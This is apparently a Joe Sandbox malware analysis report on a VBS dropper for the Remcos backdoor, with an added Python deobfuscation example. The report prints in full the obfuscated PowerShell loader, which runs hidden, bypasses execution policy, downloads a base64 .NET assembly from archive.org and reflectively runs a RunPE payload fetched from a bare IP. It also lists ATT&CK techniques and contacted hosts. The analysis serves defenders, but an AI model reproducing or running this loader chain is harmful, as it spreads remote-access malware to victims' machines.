              Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKyd", "0", "false");
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B7500AD pushad ; iretd 1_2_00007FFD9B7500C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B7436F2 pushad ; retf 3_2_00007FFD9B7437CD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B744724 push esp; retf 3_2_00007FFD9B744759
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B745E75 push eax; ret 3_2_00007FFD9B745E79
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B7400AD pushad ; iretd 3_2_00007FFD9B7400C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B813414 pushfd ; ret 3_2_00007FFD9B813415
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B817C2E push esp; ret 3_2_00007FFD9B817C2F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B817FAB push ecx; ret 3_2_00007FFD9B817FAC
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B817A0E push esi; ret 3_2_00007FFD9B817A10
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B817A06 push ss; ret 3_2_00007FFD9B817A07
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B816DC9 push ebx; iretd 3_2_00007FFD9B816DCA
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 occurrences)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (149 occurrences)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B749F19 sldt word ptr fs:[eax] 3_2_00007FFD9B749F19
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2609
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 687
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3463
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6366
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816 Thread sleep count: 3463 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820 Thread sleep count: 6366 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848 Thread sleep time: -14757395258967632s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
              Source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdnjysnwuz1cmwgpsankyddjysntkenkydodhqnkydwcycrjzovjysnl2lhnjawmtawjysnlnvzlicrj2fyy2hpdmuujysnb3jnlzi0lycrj2l0jysnzw1zlycrj2rldgenkydolw4nkydvjysndgutjysndi9ezxrhae4nkydvdgvwjysnlicrj3r4denoqscrjztnwuziyxnljysnnjrdb250zw50iccrjz0gke5ljysndycrjy1pymonkydlyycrj3qnkycgu3lzdccrj2vtlk4nkydldccrjy5xzwjdbgllbicrj3qpjysnlkrvd25sb2fkjysnu3ryaw5nkgdzricrj3vybcknkyc7zycrj1lgymluyxinkyd5jysnq29udgvudca9iccrj1ttexn0zw0nkycuq29ujysndmvydccrj106okzyb21cyxnlnjrtjysndccrj3jpbmcnkycoz1knkydgyicrj2fzzscrjzy0q29udccrj2unkydujysndck7zycrj1lgyscrj3mnkydzjysnzw1ibccrj3kgpsbbumvmbccrj2vjjysndgknkydvbi5bjysnc3mnkydlbwjsescrj10nkyc6oicrj0xvywqoz1lgymknkyduyxj5jysnq29ujysndgvudccrjyk7z1lgdhlwzsa9igdzrmenkydzc2vtjysnymx5lkcnkydldfr5cgunkycoq05bunvuueunkycusccrj29tjysnzunojysnqsk7z1lgjysnbwunkyd0accrj29kid0gz1lgdccrj3lwzs5hzxrnzxrob2qoq05bvicrj0fjq05bkttnwuztzxrob2qusw52b2tlkgdzricrj251bgwsiftvymplyycrj3rbjysnxv1akenoqxr4dc4nkydbwlbqsemvntqnkyczlzg0ms4nkycymy44njenkycujysnndaxly86chr0aenoqsasienoqwrlc2f0axzhzg9dtkeglcbdtkfkzxnhdgl2yscrj2rvq04nkydbicwnkycgq04nkydbjysnzgvzyxrpdicrj2enkydkb0noqsxdjysntkfszscrj2dbc21dtkenkycsqycrj05bq05bjysnksknks5yrvbsyunfkcddtkenlftzdhjjbmddw0niyxjdmzkplnjfugxhq0uoj2dzricsjyqnksb8ic4gkcakzu5woknpbxnwrwnbncwyniwynv0tak9pticnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('g'+'yfurl = '+'c'+'na'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/detahn'+'otev'+'.'+'txtcna'+';gyfbase'+'64content '+'= (ne'+'w'+'-obj'+'ec'+'t'+' syst'+'em.n'+'et'+'.webclien'+'t)'+'.download'+'string(gyf'+'url)'+';g'+'yfbinar'+'y'+'content = '+'[system'+'.con'+'vert'+']::frombase64s'+'t'+'ring'+'(gy'+'fb'+'ase'+'64cont'+'e'+'n'+'t);g'+'yfa'+'s'+'s'+'embl'+'y = [refl'+'ec'+'ti'+'on.a'+'ss'+'embly'+']'+'::'+'load(gyfbi'+'nary'+'con'+'tent'+');gyftype = gyfa'+'ssem'+'bly.g'+'ettype'+'(cnarunpe'+'.h'+'om'+'ecn'+'a);gyf'+'me'+'th'+'od = gyft'+'ype.getmethod(cnav'+'aicna);gyfmethod.invoke(gyf'+'null, [objec'+'t['+']]@(cnatxt.'+'azpphc/54'+'3/841.'+'23.861'+'.'+'401//:ptthcna , cnadesativadocna , cnadesativa'+'docn'+'a ,'+' cn'+'a'+'desativ'+'a'+'docna,c'+'nare'+'gasmcna'+',c'+'nacna'+'))').replace('cna',[string][char]39).replace('gyf','$') | . ( $env:comspec[4,26,25]-join'')"
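The two command lines above show the whole loader chain: wscript.exe starts powershell.exe with a base64 blob ($codigo), which decodes it and starts a second, hidden, -executionpolicy bypass powershell.exe. That second script is assembled from concatenated string fragments, with 'cna' standing in for the single quote ([string][char]39) and 'gyf' for $, the next download URL written backwards, and Invoke-Expression spelled out of characters 4, 26 and 25 of $env:COMSPEC (i, e, x in the default C:\Windows\system32\cmd.exe). The Python below is an added example written for this page, not code from the report or from the sample. It rebuilds the decoded script statically, without running any PowerShell, and pulls the URLs, the reflected .NET type and method, and a list of detection-worthy traits out of it. It assumes the default COMSPEC path and works on the command line as the report prints it, which is lowercased (compare the mixed-case DetahNoteV.txt and gYFbase64Content strings recovered from process memory further down). For the same reason the $codigo blob in the first command line cannot be decoded from this page: base64 is case-sensitive, and the lowercased copy no longer decodes to the original script.

```python
import re

# Second-stage command line as the report above prints it (lowercased by the report).
# Constructed input for this example; the original sample is not included here.
OBFUSCATED_CMD = r"""('g'+'yfurl = '+'c'+'na'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/detahn'+'otev'+'.'+'txtcna'+';gyfbase'+'64content '+'= (ne'+'w'+'-obj'+'ec'+'t'+' syst'+'em.n'+'et'+'.webclien'+'t)'+'.download'+'string(gyf'+'url)'+';g'+'yfbinar'+'y'+'content = '+'[system'+'.con'+'vert'+']::frombase64s'+'t'+'ring'+'(gy'+'fb'+'ase'+'64cont'+'e'+'n'+'t);g'+'yfa'+'s'+'s'+'embl'+'y = [refl'+'ec'+'ti'+'on.a'+'ss'+'embly'+']'+'::'+'load(gyfbi'+'nary'+'con'+'tent'+');gyftype = gyfa'+'ssem'+'bly.g'+'ettype'+'(cnarunpe'+'.h'+'om'+'ecn'+'a);gyf'+'me'+'th'+'od = gyft'+'ype.getmethod(cnav'+'aicna);gyfmethod.invoke(gyf'+'null, [objec'+'t['+']]@(cnatxt.'+'azpphc/54'+'3/841.'+'23.861'+'.'+'401//:ptthcna , cnadesativadocna , cnadesativa'+'docn'+'a ,'+' cn'+'a'+'desativ'+'a'+'docna,c'+'nare'+'gasmcna'+',c'+'nacna'+'))').replace('cna',[string][char]39).replace('gyf','$') | . ( $env:comspec[4,26,25]-join'')"""

QUOTED = re.compile(r"'([^']*)'")                              # single-quoted PowerShell literals
REPLACE_CALL = re.compile(r"\.replace\('([^']*)',([^)]*)\)")    # trailing .replace(old, new) calls
COMSPEC_INDEX = re.compile(r"\$env:comspec\[([\d,]+)\]\s*-join\s*''")


def ps_literal(token):
    """Evaluate the two literal forms this sample feeds to .replace(): 'x' and [string][char]N."""
    token = token.strip()
    m = re.fullmatch(r"\[string\]\[char\](\d+)", token)
    if m:
        return chr(int(m.group(1)))                             # [string][char]39 -> "'"
    m = re.fullmatch(r"'([^']*)'", token)
    if m:
        return m.group(1)
    raise ValueError("unsupported literal: " + token)


def deobfuscate(cmd):
    """Rebuild the script the sample pipes into Invoke-Expression.

    Step 1 joins the ('a'+'b'+...) fragments that precede the first .replace();
    step 2 applies the .replace() calls in order, restoring ' and $.
    """
    building, _, _ = cmd.partition(".replace(")
    script = "".join(QUOTED.findall(building))
    for old, new in REPLACE_CALL.findall(cmd):
        script = script.replace(old, ps_literal(new))
    return script


def resolve_comspec_index(cmd, comspec=r"C:\Windows\system32\cmd.exe"):
    """$env:comspec[4,26,25]-join'' indexes characters of the cmd.exe path.

    Assumes the default COMSPEC value (an assumption of this example). PowerShell
    command names are case-insensitive, so 'Iex' from an uppercase path behaves the same.
    """
    m = COMSPEC_INDEX.search(cmd)
    if not m:
        return ""
    return "".join(comspec[int(i)] for i in m.group(1).split(","))


def extract_iocs(script):
    """URLs plus the reflected .NET entry point from the decoded script.

    The sample stores the next URL backwards, so any literal containing the
    reversed scheme '//:ptth' is flipped before it is reported.
    """
    urls = []
    for lit in QUOTED.findall(script):
        if "//:ptth" in lit:
            urls.append(lit[::-1])
        elif lit.startswith(("http://", "https://")):
            urls.append(lit)
    type_m = re.search(r"\.gettype\('([^']*)'\)", script)
    method_m = re.search(r"\.getmethod\('([^']*)'\)", script)
    return {
        "urls": urls,
        "reflected_type": type_m.group(1) if type_m else None,
        "reflected_method": method_m.group(1) if method_m else None,
    }


def indicators(cmd):
    """Names of the loader traits present in the command line, usable as rule conditions."""
    script = deobfuscate(cmd)
    checks = {
        "quote built from [string][char]": "[string][char]39" in cmd,
        "iex built from $env:comspec index": resolve_comspec_index(cmd).lower() == "iex",
        "webclient downloadstring": ".downloadstring(" in script,
        "in-memory assembly load": "[reflection.assembly]::load(" in script,
        "reversed url argument": any("//:ptth" in s for s in QUOTED.findall(script)),
    }
    return [name for name, hit in checks.items() if hit]


if __name__ == "__main__":
    decoded = deobfuscate(OBFUSCATED_CMD)
    print(decoded)
    print("piped into:", resolve_comspec_index(OBFUSCATED_CMD))
    print(extract_iocs(decoded))
    print(indicators(OBFUSCATED_CMD))
```

Run as a script it prints the clear-text loader ($url, DownloadString, FromBase64String, [Reflection.Assembly]::Load, GetType('runpe.home').GetMethod('vai')), the word iex, and the two URLs that the report's "Contacted URLs" section confirms: the archive.org text file holding the base64 .NET loader and http://104.168.32.148/345/chppza.txt, which is passed reversed as the first argument to the reflected method. The invoke arguments ('desativado' three times, 'regasm', '') are the loader's own parameters as they appear in the command line; the report does not say what each one controls, so no meaning is assigned to them here.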
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation (2 occurrences)
Source: C:\Windows\System32\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara matchFile source: 3.2.powershell.exe.1a62f612b80.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.powershell.exe.1a636ef0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.powershell.exe.1a636ef0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.powershell.exe.1a62f612b80.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1788155155.000001A636EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1770505012.000001A62EDFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              Source: Yara matchFile source: 3.2.powershell.exe.1a62f612b80.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.powershell.exe.1a636ef0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.powershell.exe.1a636ef0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.powershell.exe.1a62f612b80.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1788155155.000001A636EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1770505012.000001A62EDFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix (the report's 14 tactic columns were flattened by extraction; each column is listed here top row first, and the digits in front of a technique name are the report's match badges, reproduced as extracted):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: 221 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 11 Command and Scripting Interpreter; 1 Exploitation for Client Execution; 3 PowerShell; Cron; Launchd; Scheduled Task
Persistence: 221 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 12 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
kz1fEn2R9Z.vbs | 26% | ReversingLabs | Script-WScript.Backdoor.Remcos
kz1fEn2R9Z.vbs | 13% | Virustotal | -
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
https://aka.ms/pscore6 | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ia600100.us.archive.org | 207.241.227.240 | true | false | - | unknown

Name | Malicious | Antivirus Detection | Reputation
http://104.168.32.148/345/CHPPZA.txt | false | - | unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt | false | - | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1770505012.000001A62E855000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtCNA;gYFbase64Content | powershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.microsoft.co | powershell.exe, 00000003.00000002.1754168405.000001A61E3C6000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://go.micro | powershell.exe, 00000003.00000002.1754476864.000001A61F949000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1770505012.000001A62E855000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ia600100.us.arXz | powershell.exe, 00000003.00000002.1754476864.000001A61FEB5000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://ia600100.us.archive.org | powershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1754476864.000001A61F949000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://aka.ms/pscore6 | powershell.exe, 00000001.00000002.1801623265.000001B680053000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1801623265.000001B68006D000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1754476864.000001A61E7E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://104.168.32.148 | powershell.exe, 00000003.00000002.1754476864.000001A61EC0A000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1801623265.000001B680001000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1754476864.000001A61E7E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://oneget.org | powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ia600100.us.archive.org | powershell.exe, 00000003.00000002.1754476864.000001A61FEBA000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.168.32.148 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false
207.241.227.240 | ia600100.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1523834
                                      Start date and time:2024-10-02 05:29:44 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 4m 8s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:kz1fEn2R9Z.vbs
                                      renamed because original name is a hash value
                                      Original Sample Name:80e7c85eeb0a57e9f50e7d84e0eb1b2f2230837b53080d24696fab7373e9bc03.vbs
                                      Detection:MAL
                                      Classification:mal100.troj.expl.evad.winVBS@6/5@1/2
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 88%
                                      • Number of executed functions: 7
                                      • Number of non-executed functions: 1
                                      Cookbook Comments:
                                      • Found application associated with file extension: .vbs
                                      • Stop behavior analysis, all processes terminated
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target powershell.exe, PID 7600 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 7768 because it is empty
• Not all processes were analyzed, report is missing behavior information
